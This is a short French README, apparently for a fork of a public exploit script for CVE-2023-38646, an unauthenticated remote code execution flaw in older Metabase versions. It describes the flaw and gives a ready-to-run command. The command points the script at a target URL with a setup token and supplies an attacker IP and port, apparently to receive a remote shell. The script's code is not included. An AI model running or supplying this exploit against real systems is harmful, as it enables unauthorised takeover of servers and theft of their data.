
CVE-2023-38646 RCE Pré-authentification dans Metabase
Fork de kh4sh3i's supprimant le besoin de Burp Collector.
CVE-2023-38646 (Pre-Auth RCE dans Metabase) :
Metabase open source avant 0.46.6.1 et Metabase Enterprise avant 1.46.6.1 permettent aux attaquants d'exécuter des commandes arbitraires sur le serveur, au niveau de privilège du serveur. L'authentification n'est pas requise pour l'exploitation.
python3 CVE-2023-38646.py -u http://target.com -t 349fa13d-fd94-4d9b-b54f-b4ebf2df682f -i 10.10.15.101 -p 5555
Pour plus d'informations, lisez ce post.